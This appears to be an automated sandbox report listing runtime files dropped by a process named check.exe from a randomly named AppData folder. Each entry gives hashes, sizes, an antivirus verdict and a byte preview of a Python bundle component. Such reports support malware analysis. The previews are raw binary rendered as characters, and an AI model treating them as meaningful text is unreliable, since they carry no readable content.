Size (bytes):	84240
Entropy (8bit):	6.607563436050078
Encrypted:	false
SSDEEP:	1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
MD5:	CB8C06C8FA9E61E4AC5F22EEBF7F1D00
SHA1:	D8E0DFC8127749947B09F17C8848166BAC659F0D
SHA-256:	FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
SHA-512:	E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..\|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131344
Entropy (8bit):	6.311142284249784
Encrypted:	false
SSDEEP:	3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
MD5:	A55E57D7594303C89B5F7A1D1D6F2B67
SHA1:	904A9304A07716497CF3E4EAAFD82715874C94F1
SHA-256:	F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
SHA-512:	FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	277776
Entropy (8bit):	6.5855511991551
Encrypted:	false
SSDEEP:	6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
MD5:	F3377F3DE29579140E2BBAEEFD334D4F
SHA1:	B3076C564DBDFD4CA1B7CC76F36448B0088E2341
SHA-256:	B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
SHA-512:	34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64272
Entropy (8bit):	6.220967684620152
Encrypted:	false
SSDEEP:	768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
MD5:	32D76C9ABD65A5D2671AEEDE189BC290
SHA1:	0D4440C9652B92B40BB92C20F3474F14E34F8D62
SHA-256:	838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
SHA-512:	49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	157968
Entropy (8bit):	6.854644275249963
Encrypted:	false
SSDEEP:	3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
MD5:	1BA022D42024A655CF289544AE461FB8
SHA1:	9772A31083223ECF66751FF3851D2E3303A0764C
SHA-256:	D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
SHA-512:	2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....\|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	33552
Entropy (8bit):	6.446391764486538
Encrypted:	false
SSDEEP:	384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
MD5:	1C03CAA59B5E4A7FB9B998D8C1DA165A
SHA1:	8A318F80A705C64076E22913C2206D9247D30CD7
SHA-256:	B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
SHA-512:	783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83728
Entropy (8bit):	6.331814573029388
Encrypted:	false
SSDEEP:	1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
MD5:	FE896371430BD9551717EF12A3E7E818
SHA1:	E2A7716E9CE840E53E8FC79D50A77F40B353C954
SHA-256:	35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
SHA-512:	67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m\|.ll}..o\|.ll}..h\|.ll}..i\|.ll}..m\|.ll}.lm}.ll}..m\|.ll}..a\|.ll}..l\|.ll}..}.ll}..n\|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...\|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181520
Entropy (8bit):	5.972827303352998
Encrypted:	false
SSDEEP:	3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
MD5:	1C0E3E447F719FBE2601D0683EA566FC
SHA1:	5321AB73B36675B238AB3F798C278195223CD7B1
SHA-256:	63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
SHA-512:	E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_wmi.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38160
Entropy (8bit):	6.338856805460127
Encrypted:	false
SSDEEP:	768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
MD5:	1C30CC7DF3BD168D883E93C593890B43
SHA1:	31465425F349DAE4EDAC9D0FEABC23CE83400807
SHA-256:	6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
SHA-512:	267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\base_library.zip

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1394456
Entropy (8bit):	5.531698507573688
Encrypted:	false
SSDEEP:	12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:	A9CBD0455B46C7D14194D1F18CA8719E
SHA1:	E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:	DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:	B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:	false
Reputation:	unknown
Preview:	PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI57162\certifi\cacert.pem

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299427
Entropy (8bit):	6.047872935262006
Encrypted:	false
SSDEEP:	6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
MD5:	50EA156B773E8803F6C1FE712F746CBA
SHA1:	2C68212E96605210EDDF740291862BDF59398AEF
SHA-256:	94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
SHA-512:	01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
Malicious:	false
Reputation:	unknown
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI57162\charset_normalizer\md.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.818583535960129
Encrypted:	false
SSDEEP:	96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
MD5:	56FE4F6C7E88212161F49E823CCC989A
SHA1:	16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
SHA-256:	002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
SHA-512:	7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	5.953784637413928
Encrypted:	false
SSDEEP:	3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
MD5:	10116447F9276F10664BA85A5614BA3A
SHA1:	EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
SHA-256:	C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
SHA-512:	C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\libcrypto-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5232408
Entropy (8bit):	5.940072183736028
Encrypted:	false
SSDEEP:	98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
MD5:	123AD0908C76CCBA4789C084F7A6B8D0
SHA1:	86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
SHA-256:	4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
SHA-512:	80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.\|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...\|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\libffi-8.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\libssl-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	792856
Entropy (8bit):	5.57949182561317
Encrypted:	false
SSDEEP:	12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
MD5:	4FF168AAA6A1D68E7957175C8513F3A2
SHA1:	782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
SHA-256:	2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
SHA-512:	C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...\|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\psutil\_psutil_windows.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	5.909456553599775
Encrypted:	false
SSDEEP:	1536:j3sHmR02IvVxv7WCyKm7c5Th4JBHTOvyyaZE:jnIvryCyKx5Th4J5OvyyO
MD5:	49AC12A1F10AB93FAFAB064FD0523A63
SHA1:	3AD6923AB0FB5D3DD9D22ED077DB15B42C2FBD4F
SHA-256:	BA033B79E858DBFCBA6BF8FB5AFE10DEFD1CB03957DBBC68E8E62E4DE6DF492D
SHA-512:	1BC0F50E0BB0A9D9DDDAD31390E5C73B0D11C2B0A8C5462065D477E93FF21F7EDC7AA2B2B36E478BE0A797A38F43E3FBEB6AAABEF0BADEC1D8D16EB73DF67255
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nT..5..5..5..#M2. 5..x@..(5..x@..&5..x@.."5..x@...5...k..(5..aM..;5..5...5...@..:5...@..+5...@^.+5...@..+5..Rich*5..................PE..d...._.g.........." .........h......\........................................@............`.........................................0...`.......@.... .......................0..(.......................................8............................................text...h........................... ..`.rdata..\I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\python3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70416
Entropy (8bit):	6.1258200129869405
Encrypted:	false
SSDEEP:	768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
MD5:	16855EBEF31C5B1EBE767F1C617645B3
SHA1:	315521F3A748ABFA35CD4D48E8DD09D0556D989B
SHA-256:	A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
SHA-512:	C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\python313.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6083856
Entropy (8bit):	6.126922729922386
Encrypted:	false
SSDEEP:	49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
MD5:	B9DE917B925DD246B709BB4233777EFD
SHA1:	775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
SHA-256:	0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
SHA-512:	F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\select.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30992
